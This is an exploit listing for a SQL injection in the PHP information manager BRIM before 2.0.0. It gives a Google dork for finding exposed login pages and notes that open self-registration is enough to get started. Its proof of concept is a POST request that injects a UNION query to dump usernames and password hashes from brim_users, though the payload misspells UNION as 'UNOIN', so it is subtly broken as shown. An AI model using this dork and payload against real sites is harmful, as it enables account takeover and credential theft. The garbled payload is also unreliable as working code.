27 lines
No EOL
1.3 KiB
Text
27 lines
No EOL
1.3 KiB
Text
BRIM < 2.0.0 SQL InjectionExploit information
|
||
|
||
- Exploit Title: BRIM < 2.0.0 SQL Injection
|
||
- Google Dork: "Brim project" intitle:"Brim - login"
|
||
- Date: 2012-02-20
|
||
- Author: ifnull
|
||
- Tested on: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45 <20> although it should
|
||
work on any environment. Example uses MySQL 5 query escape but can easily
|
||
be ported to prior versions of MySQL.
|
||
- Description: Unlike CVE-2008-4082, this will work with or without
|
||
magic_quotes_gpc enabled. Like the last exploit however, you must first
|
||
create an account and enable "tasks". By default anyone can create an
|
||
account and the accounts are automatically approved.
|
||
|
||
Software information
|
||
|
||
- Version: < 2.0.0
|
||
- Link: http://sourceforge.net/projects/brim/
|
||
- Description: BRIM is a MVC framework, written in PHP and based on
|
||
items with a hierarchical relationship. The list of plugins make BRIM a
|
||
Information Manager with plugins like bookmarks, a calendar, contacts
|
||
tasks, notes, RSS etc. The application is multilingual.
|
||
|
||
Proof of ConceptPOST
|
||
|
||
URI: /index.php
|
||
Data: plugin=tasks&field=1%3D1%20UNOIN%20SELECT%201%2C2%2C3%2C4%2CCONCAT(loginname%2C0x3a%2Cpassword)%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%20from%20brim_users--&value=asdf&action=searchTasks |